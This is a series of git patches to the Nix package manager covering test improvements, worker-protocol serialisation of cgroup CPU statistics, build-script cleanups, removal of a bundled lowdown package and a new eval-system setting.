--- tests/unit/libexpr-support/tests/libexpr.hh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tests/unit/libexpr-support/tests/libexpr.hh b/tests/unit/libexpr-support/tests/libexpr.hh index 968431446..d720cedde 100644 --- a/tests/unit/libexpr-support/tests/libexpr.hh +++ b/tests/unit/libexpr-support/tests/libexpr.hh @@ -8,6 +8,7 @@ #include "nixexpr.hh" #include "eval.hh" #include "eval-inline.hh" +#include "eval-settings.hh" #include "store-api.hh" #include "tests/libstore.hh" @@ -18,6 +19,7 @@ namespace nix { static void SetUpTestSuite() { LibStoreTest::SetUpTestSuite(); initGC(); + evalSettings.nixPath = {}; } protected: From 19ec1c9fd4d4bf6e941b046b8549ba2a1a690937 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 13 Dec 2023 15:15:30 +0100 Subject: [PATCH 111/654] Improve the unsafeGetAttrPos test We can use corepkgsFS->addFile() now to create a "real" position. --- tests/unit/libexpr/primops.cc | 23 ++++++++++++++++++++--- 1 file changed, 20 insertions(+), 3 deletions(-) diff --git a/tests/unit/libexpr/primops.cc b/tests/unit/libexpr/primops.cc index 7485fa0d0..384d9924b 100644 --- a/tests/unit/libexpr/primops.cc +++ b/tests/unit/libexpr/primops.cc @@ -1,6 +1,8 @@ #include #include +#include "memory-input-accessor.hh" + #include "tests/libexpr.hh" namespace nix { @@ -148,10 +150,25 @@ namespace nix { } TEST_F(PrimOpTest, unsafeGetAttrPos) { - // The `y` attribute is at position - const char* expr = "builtins.unsafeGetAttrPos \"y\" { y = \"x\"; }"; + state.corepkgsFS->addFile(CanonPath("foo.nix"), "{ y = \"x\"; }"); + + auto expr = "builtins.unsafeGetAttrPos \"y\" (import )"; auto v = eval(expr); - ASSERT_THAT(v, IsNull()); + ASSERT_THAT(v, IsAttrsOfSize(3)); + + auto file = v.attrs->find(createSymbol("file")); + ASSERT_NE(file, nullptr); + ASSERT_THAT(*file->value, IsString()); + auto s = baseNameOf(file->value->string_view()); + ASSERT_EQ(s, "foo.nix"); + + auto line = v.attrs->find(createSymbol("line")); + ASSERT_NE(line, nullptr); + 
ASSERT_THAT(*line->value, IsIntEq(1)); + + auto column = v.attrs->find(createSymbol("column")); + ASSERT_NE(column, nullptr); + ASSERT_THAT(*column->value, IsIntEq(3)); } TEST_F(PrimOpTest, hasAttr) { From e76df8781417dad9ab4f0a6c3b28917e35f204bf Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 11:26:14 -0500 Subject: [PATCH 112/654] Test `nix copy --substitute-on-destination` It works with both `ssh://` and `ssh-ng://` now since #9600 (and `ssh-ng:// didn't work before that). Also, by making the two tests share code, we nudge ourselves towards making sure there is feature parity. --- tests/functional/nix-copy-ssh-common.sh | 70 +++++++++++++++++++++++++ tests/functional/nix-copy-ssh-ng.sh | 16 +++--- tests/functional/nix-copy-ssh.sh | 19 +------ 3 files changed, 77 insertions(+), 28 deletions(-) create mode 100644 tests/functional/nix-copy-ssh-common.sh diff --git a/tests/functional/nix-copy-ssh-common.sh b/tests/functional/nix-copy-ssh-common.sh new file mode 100644 index 000000000..cc8314ff7 --- /dev/null +++ b/tests/functional/nix-copy-ssh-common.sh @@ -0,0 +1,70 @@ +proto=$1 +shift +(( $# == 0 )) + +clearStore +clearCache + +mkdir -p $TEST_ROOT/stores + +# Create path to copy back and forth +outPath=$(nix-build --no-out-link dependencies.nix) + +storeQueryParam="store=${NIX_STORE_DIR}" + +realQueryParam () { + echo "real=$1$NIX_STORE_DIR" +} + +remoteRoot="$TEST_ROOT/stores/$proto" + +clearRemoteStore () { + chmod -R u+w "$remoteRoot" || true + rm -rf "$remoteRoot" +} + +clearRemoteStore + +remoteStore="${proto}://localhost?${storeQueryParam}&remote-store=${remoteRoot}%3f${storeQueryParam}%26$(realQueryParam "$remoteRoot")" + +# Copy to store + +args=() +if [[ "$proto" == "ssh-ng" ]]; then + # TODO investigate discrepancy + args+=(--no-check-sigs) +fi + +[ ! -f ${remoteRoot}${outPath}/foobar ] +nix copy "${args[@]}" --to "$remoteStore" $outPath +[ -f ${remoteRoot}${outPath}/foobar ] + +# Copy back from store + +clearStore + +[ ! 
-f $outPath/foobar ] +nix copy --no-check-sigs --from "$remoteStore" $outPath +[ -f $outPath/foobar ] + +# Check --substitute-on-destination, avoid corrupted store + +clearRemoteStore + +corruptedRoot=$TEST_ROOT/stores/corrupted +corruptedStore="${corruptedRoot}?${storeQueryParam}&$(realQueryParam "$corruptedRoot")" + +# Copy it to the corrupted store +nix copy --no-check-sigs "$outPath" --to "$corruptedStore" + +# Corrupt it in there +corruptPath="${corruptedRoot}${outPath}" +chmod +w "$corruptPath" +echo "not supposed to be here" > "$corruptPath/foobarbaz" +chmod -w "$corruptPath" + +# Copy from the corrupted store with the regular store as a +# substituter. It must use the substituter not the source store in +# order to avoid errors. +NIX_CONFIG=$(echo -e "substituters = local\nrequire-sigs = false") \ + nix copy --no-check-sigs --from "$corruptedStore" --to "$remoteStore" --substitute-on-destination "$outPath" diff --git a/tests/functional/nix-copy-ssh-ng.sh b/tests/functional/nix-copy-ssh-ng.sh index 463b5e0c4..62e99cd24 100644 --- a/tests/functional/nix-copy-ssh-ng.sh +++ b/tests/functional/nix-copy-ssh-ng.sh @@ -1,18 +1,14 @@ source common.sh -clearStore -clearCache +source nix-copy-ssh-common.sh "ssh-ng" -remoteRoot=$TEST_ROOT/store2 -chmod -R u+w "$remoteRoot" || true -rm -rf "$remoteRoot" +clearStore +clearRemoteStore outPath=$(nix-build --no-out-link dependencies.nix) -nix store info --store "ssh-ng://localhost?store=$NIX_STORE_DIR&remote-store=$remoteRoot%3fstore=$NIX_STORE_DIR%26real=$remoteRoot$NIX_STORE_DIR" +nix store info --store "$remoteStore" # Regression test for https://github.com/NixOS/nix/issues/6253 -nix copy --to "ssh-ng://localhost?store=$NIX_STORE_DIR&remote-store=$remoteRoot%3fstore=$NIX_STORE_DIR%26real=$remoteRoot$NIX_STORE_DIR" $outPath --no-check-sigs & -nix copy --to "ssh-ng://localhost?store=$NIX_STORE_DIR&remote-store=$remoteRoot%3fstore=$NIX_STORE_DIR%26real=$remoteRoot$NIX_STORE_DIR" $outPath --no-check-sigs - -[ -f 
$remoteRoot$outPath/foobar ] +nix copy --to "$remoteStore" $outPath --no-check-sigs & +nix copy --to "$remoteStore" $outPath --no-check-sigs diff --git a/tests/functional/nix-copy-ssh.sh b/tests/functional/nix-copy-ssh.sh index eb801548d..12e8346bc 100644 --- a/tests/functional/nix-copy-ssh.sh +++ b/tests/functional/nix-copy-ssh.sh @@ -1,20 +1,3 @@ source common.sh -clearStore -clearCache - -remoteRoot=$TEST_ROOT/store2 -chmod -R u+w "$remoteRoot" || true -rm -rf "$remoteRoot" - -outPath=$(nix-build --no-out-link dependencies.nix) - -nix copy --to "ssh://localhost?store=$NIX_STORE_DIR&remote-store=$remoteRoot%3fstore=$NIX_STORE_DIR%26real=$remoteRoot$NIX_STORE_DIR" $outPath - -[ -f $remoteRoot$outPath/foobar ] - -clearStore - -nix copy --no-check-sigs --from "ssh://localhost?store=$NIX_STORE_DIR&remote-store=$remoteRoot%3fstore=$NIX_STORE_DIR%26real=$remoteRoot$NIX_STORE_DIR" $outPath - -[ -f $outPath/foobar ] +source nix-copy-ssh-common.sh "ssh" From 19573f1b05b7d3ccfd07c9c351396494d488ab2d Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 15:33:15 -0500 Subject: [PATCH 113/654] Restore comment --- scripts/binary-tarball.nix | 1 + 1 file changed, 1 insertion(+) diff --git a/scripts/binary-tarball.nix b/scripts/binary-tarball.nix index 32e811c94..104189b0c 100644 --- a/scripts/binary-tarball.nix +++ b/scripts/binary-tarball.nix @@ -14,6 +14,7 @@ let inherit (nix) version; env = { + #nativeBuildInputs = lib.optional (system != "aarch64-linux") shellcheck; meta.description = "Distribution-independent Nix bootstrap binaries for ${system}"; }; From f10f0f1b50228e09ad587a7c550df586061e4514 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 20:41:20 +0000 Subject: [PATCH 114/654] Move `lowdown.nix` to `misc/` --- flake.nix | 2 +- lowdown.nix => misc/lowdown.nix | 0 2 files changed, 1 insertion(+), 1 deletion(-) rename lowdown.nix => misc/lowdown.nix (100%) diff --git a/flake.nix b/flake.nix index 0cdd2b41f..c7ff7eb64 100644 --- 
a/flake.nix +++ b/flake.nix @@ -167,7 +167,7 @@ ''; }; - lowdown-nix = final.callPackage ./lowdown.nix { + lowdown-nix = final.callPackage ./misc/lowdown.nix { inherit lowdown-src stdenv; }; diff --git a/lowdown.nix b/misc/lowdown.nix similarity index 100% rename from lowdown.nix rename to misc/lowdown.nix From bf5804d46a0d0aa5eb40107b6eaeec4e95bbd4a2 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 20:41:41 +0000 Subject: [PATCH 115/654] flake.nix: Delete uneeded `attrs0` binding --- package.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/package.nix b/package.nix index 7c1ba3130..8fc4be328 100644 --- a/package.nix +++ b/package.nix @@ -92,7 +92,7 @@ , __forDefaults ? { canRunInstalled = doBuild && stdenv.buildPlatform.canExecute stdenv.hostPlatform; } -} @ attrs0: +}: let version = lib.fileContents ./.version + versionSuffix; From 28f2f3136d19ef7de4c6acd9678aef72e80d4fb8 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 20:47:36 +0000 Subject: [PATCH 116/654] Delete stray `install_name_tool` call --- package.nix | 1 - 1 file changed, 1 deletion(-) diff --git a/package.nix b/package.nix index 8fc4be328..0b5b512c7 100644 --- a/package.nix +++ b/package.nix @@ -320,7 +320,6 @@ in { -change ${boost}/lib/libboost_context.dylib \ $out/lib/libboost_context.dylib \ $out/lib/libnixutil.dylib - install_name_tool '' ) + lib.optionalString enableInternalAPIDocs '' mkdir -p ''${!outputDoc}/nix-support From 2d24875fe4aa7f31d15acfc29b9aa5c45109f99d Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 20:49:31 +0000 Subject: [PATCH 117/654] package.nix: Avoid `${..}` for conditional strings Using `+` is Nixpkgs standard ideom for this, and helps avoid needless rebuilds somewhat. 
--- package.nix | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/package.nix b/package.nix index 0b5b512c7..0b2ff43b0 100644 --- a/package.nix +++ b/package.nix @@ -254,25 +254,25 @@ in { disallowedReferences = [ boost ]; - preConfigure = lib.optionalString (doBuild && ! stdenv.hostPlatform.isStatic) '' - # Copy libboost_context so we don't get all of Boost in our closure. - # https://github.com/NixOS/nixpkgs/issues/45462 - mkdir -p $out/lib - cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib - rm -f $out/lib/*.a - ${lib.optionalString stdenv.hostPlatform.isLinux '' + preConfigure = lib.optionalString (doBuild && ! stdenv.hostPlatform.isStatic) ( + '' + # Copy libboost_context so we don't get all of Boost in our closure. + # https://github.com/NixOS/nixpkgs/issues/45462 + mkdir -p $out/lib + cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib + rm -f $out/lib/*.a + '' + lib.optionalString stdenv.hostPlatform.isLinux '' chmod u+w $out/lib/*.so.* patchelf --set-rpath $out/lib:${stdenv.cc.cc.lib}/lib $out/lib/libboost_thread.so.* - ''} - ${lib.optionalString stdenv.hostPlatform.isDarwin '' + '' + lib.optionalString stdenv.hostPlatform.isDarwin '' for LIB in $out/lib/*.dylib; do chmod u+w $LIB install_name_tool -id $LIB $LIB install_name_tool -delete_rpath ${boost}/lib/ $LIB || true done install_name_tool -change ${boost}/lib/libboost_system.dylib $out/lib/libboost_system.dylib $out/lib/libboost_thread.dylib - ''} - ''; + '' + ); configureFlags = [ "--sysconfdir=/etc" From 7b29b44d8e62f686aa9fbfafe53be959cdba03cb Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 16:22:35 -0500 Subject: [PATCH 118/654] Remove custom lowdown This was last upgraded in 788008385ef5bf7edb799977525d6f73f02c76bc, but the version in Nixpkgs is a now a lot newer. 
I think the custom was added to get ahead of Nixpkgs before, and so now that we are in fact behind, it is no longer needed. --- flake.lock | 17 ----------------- flake.nix | 11 +---------- misc/lowdown.nix | 22 ---------------------- 3 files changed, 1 insertion(+), 49 deletions(-) delete mode 100644 misc/lowdown.nix diff --git a/flake.lock b/flake.lock index 3cb9e72c9..db1a72c14 100644 --- a/flake.lock +++ b/flake.lock @@ -32,22 +32,6 @@ "type": "github" } }, - "lowdown-src": { - "flake": false, - "locked": { - "lastModified": 1633514407, - "narHash": "sha256-Dw32tiMjdK9t3ETl5fzGrutQTzh2rufgZV4A/BbxuD4=", - "owner": "kristapsdz", - "repo": "lowdown", - "rev": "d2c2b44ff6c27b936ec27358a2653caaef8f73b8", - "type": "github" - }, - "original": { - "owner": "kristapsdz", - "repo": "lowdown", - "type": "github" - } - }, "nixpkgs": { "locked": { "lastModified": 1701355166, @@ -84,7 +68,6 @@ "inputs": { "flake-compat": "flake-compat", "libgit2": "libgit2", - "lowdown-src": "lowdown-src", "nixpkgs": "nixpkgs", "nixpkgs-regression": "nixpkgs-regression" } diff --git a/flake.nix b/flake.nix index c7ff7eb64..eb3846564 100644 --- a/flake.nix +++ b/flake.nix @@ -13,11 +13,10 @@ # to remove the `nix.checkAllErrors = false;` line in the tests. inputs.nixpkgs.url = "github:NixOS/nixpkgs/staging-23.05"; inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2"; - inputs.lowdown-src = { url = "github:kristapsdz/lowdown"; flake = false; }; inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; }; inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; }; - outputs = { self, nixpkgs, nixpkgs-regression, lowdown-src, libgit2, ... }: + outputs = { self, nixpkgs, nixpkgs-regression, libgit2, ... 
}: let inherit (nixpkgs) lib; @@ -140,9 +139,6 @@ { nixStable = prev.nix; - # Forward from the previous stage as we don’t want it to pick the lowdown override - inherit (prev) nixUnstable; - default-busybox-sandbox-shell = final.busybox.override { useMusl = true; enableStatic = true; @@ -167,10 +163,6 @@ ''; }; - lowdown-nix = final.callPackage ./misc/lowdown.nix { - inherit lowdown-src stdenv; - }; - libgit2-nix = final.libgit2.overrideAttrs (attrs: { src = libgit2; version = libgit2.lastModifiedDate; @@ -208,7 +200,6 @@ officialRelease = false; boehmgc = final.boehmgc-nix; libgit2 = final.libgit2-nix; - lowdown = final.lowdown-nix; busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell; changelog-d = final.changelog-d-nix; } // { diff --git a/misc/lowdown.nix b/misc/lowdown.nix deleted file mode 100644 index 5f469fad5..000000000 --- a/misc/lowdown.nix +++ /dev/null @@ -1,22 +0,0 @@ -{ lib -, stdenv -, which -, lowdown-src -}: - -stdenv.mkDerivation rec { - name = "lowdown-0.9.0"; - - src = lowdown-src; - - outputs = [ "out" "bin" "dev" ]; - - nativeBuildInputs = [ which ]; - - configurePhase = '' - ${lib.optionalString (stdenv.isDarwin && stdenv.isAarch64) "echo \"HAVE_SANDBOX_INIT=false\" > configure.local"} - ./configure \ - PREFIX=${placeholder "dev"} \ - BINDIR=${placeholder "bin"}/bin - ''; -} From 1e3d8118401d80da54fb64641e606042c3499e4d Mon Sep 17 00:00:00 2001 From: Ramses Date: Wed, 13 Dec 2023 22:37:17 +0100 Subject: [PATCH 119/654] worker protocol: serialise cgroup stats in `BuildResult` (#9598) By doing so, they get reported when building through the daemon via either `unix://` or `ssh-ng://`. 
--- doc/manual/rl-next/cgroup-stats.md | 8 +++ src/libstore/worker-protocol.cc | 34 ++++++++++ src/libstore/worker-protocol.hh | 6 +- .../worker-protocol/build-result-1.37.bin | Bin 0 -> 808 bytes tests/unit/libstore/worker-protocol.cc | 61 ++++++++++++++++-- 5 files changed, 101 insertions(+), 8 deletions(-) create mode 100644 doc/manual/rl-next/cgroup-stats.md create mode 100644 tests/unit/libstore/data/worker-protocol/build-result-1.37.bin diff --git a/doc/manual/rl-next/cgroup-stats.md b/doc/manual/rl-next/cgroup-stats.md new file mode 100644 index 000000000..00853a0f8 --- /dev/null +++ b/doc/manual/rl-next/cgroup-stats.md @@ -0,0 +1,8 @@ +--- +synopsis: Include cgroup stats when building through the daemon +prs: 9598 +--- + +Nix now also reports cgroup statistics when building through the nix daemon and when doing remote builds using ssh-ng, +if both sides of the connection are this version of Nix or newer. + diff --git a/src/libstore/worker-protocol.cc b/src/libstore/worker-protocol.cc index 2a379e75e..a50259d24 100644 --- a/src/libstore/worker-protocol.cc +++ b/src/libstore/worker-protocol.cc @@ -7,6 +7,7 @@ #include "archive.hh" #include "path-info.hh" +#include #include namespace nix { @@ -47,6 +48,31 @@ void WorkerProto::Serialise>::write(const StoreDirCon } +std::optional WorkerProto::Serialise>::read(const StoreDirConfig & store, WorkerProto::ReadConn conn) +{ + auto tag = readNum(conn.from); + switch (tag) { + case 0: + return std::nullopt; + case 1: + return std::optional{std::chrono::microseconds(readNum(conn.from))}; + default: + throw Error("Invalid optional tag from remote"); + } +} + +void WorkerProto::Serialise>::write(const StoreDirConfig & store, WorkerProto::WriteConn conn, const std::optional & optDuration) +{ + if (!optDuration.has_value()) { + conn.to << uint8_t{0}; + } else { + conn.to + << uint8_t{1} + << optDuration.value().count(); + } +} + + DerivedPath WorkerProto::Serialise::read(const StoreDirConfig & store, WorkerProto::ReadConn 
conn) { auto s = readString(conn.from); @@ -110,6 +136,10 @@ BuildResult WorkerProto::Serialise::read(const StoreDirConfig & sto >> res.startTime >> res.stopTime; } + if (GET_PROTOCOL_MINOR(conn.version) >= 37) { + res.cpuUser = WorkerProto::Serialise>::read(store, conn); + res.cpuSystem = WorkerProto::Serialise>::read(store, conn); + } if (GET_PROTOCOL_MINOR(conn.version) >= 28) { auto builtOutputs = WorkerProto::Serialise::read(store, conn); for (auto && [output, realisation] : builtOutputs) @@ -132,6 +162,10 @@ void WorkerProto::Serialise::write(const StoreDirConfig & store, Wo << res.startTime << res.stopTime; } + if (GET_PROTOCOL_MINOR(conn.version) >= 37) { + WorkerProto::write(store, conn, res.cpuUser); + WorkerProto::write(store, conn, res.cpuSystem); + } if (GET_PROTOCOL_MINOR(conn.version) >= 28) { DrvOutputs builtOutputs; for (auto & [output, realisation] : res.builtOutputs) diff --git a/src/libstore/worker-protocol.hh b/src/libstore/worker-protocol.hh index c26914289..91d277b77 100644 --- a/src/libstore/worker-protocol.hh +++ b/src/libstore/worker-protocol.hh @@ -1,6 +1,8 @@ #pragma once ///@file +#include + #include "common-protocol.hh" namespace nix { @@ -9,7 +11,7 @@ namespace nix { #define WORKER_MAGIC_1 0x6e697863 #define WORKER_MAGIC_2 0x6478696f -#define PROTOCOL_VERSION (1 << 8 | 36) +#define PROTOCOL_VERSION (1 << 8 | 37) #define GET_PROTOCOL_MAJOR(x) ((x) & 0xff00) #define GET_PROTOCOL_MINOR(x) ((x) & 0x00ff) @@ -214,6 +216,8 @@ template<> DECLARE_WORKER_SERIALISER(UnkeyedValidPathInfo); template<> DECLARE_WORKER_SERIALISER(std::optional); +template<> +DECLARE_WORKER_SERIALISER(std::optional); template DECLARE_WORKER_SERIALISER(std::vector); diff --git a/tests/unit/libstore/data/worker-protocol/build-result-1.37.bin b/tests/unit/libstore/data/worker-protocol/build-result-1.37.bin new file mode 100644 index 0000000000000000000000000000000000000000..7d6e43fff2f593c9669897f1594ef2526293b866 GIT binary patch literal 808 
zcmc(b!A=4(5QbNYCw&D7HXbqAZP|9&SMZ?mYCOy`Q??0dfh{3~@J_yn?_}3497ssi zkk~`NPG{zy$$yh{=Qh&1p+SP-rryS%zu_*nozv~b{8i*2l1Kg&hyFwTsm?J^pZ&Jx z7(XWuZG7Ec;XHLnni_a6OQ{Pv(Gvn*a8V&-GN)9gN@`4z#zM+q67p$E1#+ya@Ky@P zI?Ja*37y|pu=-Z~h`Kw5v>=OQ{VT!TG~kW14J&v15i`h2cEQPP#N67yfUkq@EZeAh nE0*W@7*-7pjhR{S>lKBa-ro0@_Cq`OPkw~Szw@JOIPv2Pj)JK^ literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/worker-protocol.cc b/tests/unit/libstore/worker-protocol.cc index 91f804f0c..2b2e559a9 100644 --- a/tests/unit/libstore/worker-protocol.cc +++ b/tests/unit/libstore/worker-protocol.cc @@ -280,13 +280,60 @@ VERSIONED_CHARACTERIZATION_TEST( }, .startTime = 30, .stopTime = 50, -#if 0 - // These fields are not yet serialized. - // FIXME Include in next version of protocol or document - // why they are skipped. - .cpuUser = std::chrono::milliseconds(500s), - .cpuSystem = std::chrono::milliseconds(604s), -#endif + }, + }; + t; + })) + +VERSIONED_CHARACTERIZATION_TEST( + WorkerProtoTest, + buildResult_1_37, + "build-result-1.37", + 1 << 8 | 37, + ({ + using namespace std::literals::chrono_literals; + std::tuple t { + BuildResult { + .status = BuildResult::OutputRejected, + .errorMsg = "no idea why", + }, + BuildResult { + .status = BuildResult::NotDeterministic, + .errorMsg = "no idea why", + .timesBuilt = 3, + .isNonDeterministic = true, + .startTime = 30, + .stopTime = 50, + }, + BuildResult { + .status = BuildResult::Built, + .timesBuilt = 1, + .builtOutputs = { + { + "foo", + { + .id = DrvOutput { + .drvHash = Hash::parseSRI("sha256-b4afnqKCO9oWXgYHb9DeQ2berSwOjS27rSd9TxXDc/U="), + .outputName = "foo", + }, + .outPath = StorePath { "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-foo" }, + }, + }, + { + "bar", + { + .id = DrvOutput { + .drvHash = Hash::parseSRI("sha256-b4afnqKCO9oWXgYHb9DeQ2berSwOjS27rSd9TxXDc/U="), + .outputName = "bar", + }, + .outPath = StorePath { "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar" }, + }, + }, + }, + .startTime = 30, + .stopTime = 50, + .cpuUser = std::chrono::microseconds(500s), + 
.cpuSystem = std::chrono::microseconds(604s), }, }; t; From 6ed803737c587a0cc9026093c941c1d1172fa5dc Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Wed, 13 Dec 2023 14:02:52 -0800 Subject: [PATCH 120/654] Use `--with-boost` on macOS `configureFlags` only included `--with-boost` on Linux, which makes local builds as outlined in `doc/manual/src/contributing/hacking.md` fail when performed on macOS. --- package.nix | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/package.nix b/package.nix index 0b2ff43b0..24395b484 100644 --- a/package.nix +++ b/package.nix @@ -284,8 +284,9 @@ in { ] ++ lib.optionals installUnitTests [ "--with-check-bin-dir=${builtins.placeholder "check"}/bin" "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ] ++ lib.optionals (doBuild && stdenv.isLinux) [ + ] ++ lib.optionals (doBuild) [ "--with-boost=${boost}/lib" + ] ++ lib.optionals (doBuild && stdenv.isLinux) [ "--with-sandbox-shell=${busybox-sandbox-shell}/bin/busybox" ] ++ lib.optional (doBuild && stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) "LDFLAGS=-fuse-ld=gold" From 06e106beff4fe9922d1e5debe7a16daec26c398d Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 14 Dec 2023 13:38:10 +0100 Subject: [PATCH 121/654] Disable GitHub tree hash mismatch warning --- src/libfetchers/github.cc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc index d07aa3cea..0f30723cf 100644 --- a/src/libfetchers/github.cc +++ b/src/libfetchers/github.cc @@ -238,12 +238,14 @@ struct GitArchiveInputScheme : InputScheme cache->upsert(treeHashKey, Attrs{{"treeHash", tarballInfo.treeHash.gitRev()}}); cache->upsert(lastModifiedKey, Attrs{{"lastModified", (uint64_t) tarballInfo.lastModified}}); + #if 0 if (upstreamTreeHash != tarballInfo.treeHash) warn( "Git tree hash mismatch for revision '%s' of '%s': " "expected '%s', got '%s'. 
" "This can happen if the Git repository uses submodules.", rev->gitRev(), input.to_string(), upstreamTreeHash->gitRev(), tarballInfo.treeHash.gitRev()); + #endif return {std::move(input), tarballInfo}; } From e13fc0bbdb1e1eefeb33ff4d18310958041b1ad5 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 8 Dec 2023 19:52:08 -0500 Subject: [PATCH 122/654] Fix `sys/xattr.h` check I wrote the `configure.ac` wrong, and so we just got no builds supporting ACLs. Also, it needs to be more precise because Darwin puts other stuff in that same header, evidently. --- configure.ac | 3 ++- src/libstore/posix-fs-canonicalise.cc | 2 +- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/configure.ac b/configure.ac index f9ad3c840..a949f9df2 100644 --- a/configure.ac +++ b/configure.ac @@ -289,7 +289,8 @@ esac AC_SUBST(HAVE_SECCOMP, [$have_seccomp]) # Optional dependencies for better normalizing file system data -AC_CHECK_HEADERS[sys/xattr.h] +AC_CHECK_HEADERS([sys/xattr.h]) +AC_CHECK_FUNCS([llistxattr lremovexattr]) # Look for aws-cpp-sdk-s3. AC_LANG_PUSH(C++) diff --git a/src/libstore/posix-fs-canonicalise.cc b/src/libstore/posix-fs-canonicalise.cc index f38fa8369..5edda0157 100644 --- a/src/libstore/posix-fs-canonicalise.cc +++ b/src/libstore/posix-fs-canonicalise.cc @@ -78,7 +78,7 @@ static void canonicalisePathMetaData_( if (!(S_ISREG(st.st_mode) || S_ISDIR(st.st_mode) || S_ISLNK(st.st_mode))) throw Error("file '%1%' has an unsupported type", path); -#ifdef HAVE_SYS_XATTR_H +#if HAVE_SYS_XATTR_H && HAVE_LLISTXATTR && HAVE_LREMOVEXATTR /* Remove extended attributes / ACLs. 
*/ ssize_t eaSize = llistxattr(path.c_str(), nullptr, 0); From 8d39c0c19638eb0cd07c1d0af89320e33f9c02d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jos=C3=A9=20Luis=20Lafuente?= Date: Thu, 14 Dec 2023 23:14:59 +0100 Subject: [PATCH 123/654] Fix clang devshell Issue introduced in https://github.com/NixOS/nix/pull/9535 --- package.nix | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/package.nix b/package.nix index 24395b484..6ea5bf9c9 100644 --- a/package.nix +++ b/package.nix @@ -5,6 +5,7 @@ , autoreconfHook , aws-sdk-cpp , boehmgc +, buildPackages , nlohmann_json , bison , boost @@ -207,6 +208,9 @@ in { # changelog ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d ++ lib.optional enableInternalAPIDocs doxygen + + ++ lib.optional stdenv.cc.isClang buildPackages.bear + ++ lib.optional (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) buildPackages.clang-tools ; buildInputs = lib.optionals doBuild [ From bcbdb09ccf7ca007d3c2046177356fbfe7b72304 Mon Sep 17 00:00:00 2001 From: Matthew Bauer Date: Tue, 29 Sep 2020 15:33:47 -0400 Subject: [PATCH 124/654] Add eval-system option `eval-system` option overrides just the value of `builtins.currentSystem`. This is more useful than overriding `system` since you can build these derivations on remote builders which can work on the given system. 
Co-authored-by: John Ericson Co-authored-by: Valentin Gagarin --- src/libexpr/eval-settings.cc | 6 ++++++ src/libexpr/eval-settings.hh | 20 ++++++++++++++++++++ src/libexpr/primops.cc | 11 +++++++---- src/libstore/globals.hh | 6 +++++- tests/unit/libexpr/primops.cc | 3 ++- 5 files changed, 40 insertions(+), 6 deletions(-) diff --git a/src/libexpr/eval-settings.cc b/src/libexpr/eval-settings.cc index 444a7d7d6..2ccbe327f 100644 --- a/src/libexpr/eval-settings.cc +++ b/src/libexpr/eval-settings.cc @@ -89,6 +89,12 @@ std::string EvalSettings::resolvePseudoUrl(std::string_view url) return std::string(url); } +const std::string & EvalSettings::getCurrentSystem() +{ + const auto & evalSystem = currentSystem.get(); + return evalSystem != "" ? evalSystem : settings.thisSystem.get(); +} + EvalSettings evalSettings; static GlobalConfig::Register rEvalSettings(&evalSettings); diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh index 3009a462c..ad187ca01 100644 --- a/src/libexpr/eval-settings.hh +++ b/src/libexpr/eval-settings.hh @@ -27,6 +27,26 @@ struct EvalSettings : Config [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath). )"}; + Setting currentSystem{ + this, "", "eval-system", + R"( + This option defines + [`builtins.currentSystem`](@docroot@/language/builtin-constants.md#builtins-currentSystem) + in the Nix language if it is set as a non-empty string. + Otherwise, if it is defined as the empty string (the default), the value of the + [`system` ](#conf-system) + configuration setting is used instead. + + Unlike `system`, this setting does not change what kind of derivations can be built locally. + This is useful for evaluating Nix code on one system to produce derivations to be built on another type of system. + )"}; + + /** + * Implements the `eval-system` vs `system` defaulting logic + * described for `eval-system`. 
